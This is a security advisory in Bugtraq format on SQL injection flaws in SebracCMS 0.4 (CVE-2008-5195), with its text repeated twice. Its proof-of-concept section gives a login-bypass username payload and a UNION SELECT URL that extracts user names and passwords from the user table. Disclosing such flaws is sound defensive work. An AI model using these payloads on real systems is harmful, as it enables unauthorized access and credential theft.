SebracCMS Multiple SQL Injection Vulnerabilities
BID:30003
Info
SebracCMS Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 30003 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-5195 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 28 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | shinmai |
| Vulnerable: |
Sebrac SebracCMS 0.4 |
| Not Vulnerable: | |
Discussion
SebracCMS Multiple SQL Injection Vulnerabilities
SebracCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SebracCMS 0.4 and prior versions are affected by these issues.
SebracCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SebracCMS 0.4 and prior versions are affected by these issues.
Exploit / POC
SebracCMS Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept examples are available:
Use the following as a username:
admin' OR '1'='1
http://www.example.com/sbcms/cms/form/read.php?recid=1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1
Attackers can use a browser to exploit these issues.
The following proof-of-concept examples are available:
Use the following as a username:
admin' OR '1'='1
http://www.example.com/sbcms/cms/form/read.php?recid=1' UNION ALL SELECT uname, uname, uname, pw, uname FROM sbc_user WHERE '1'='1
Solution / Fix
SebracCMS Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].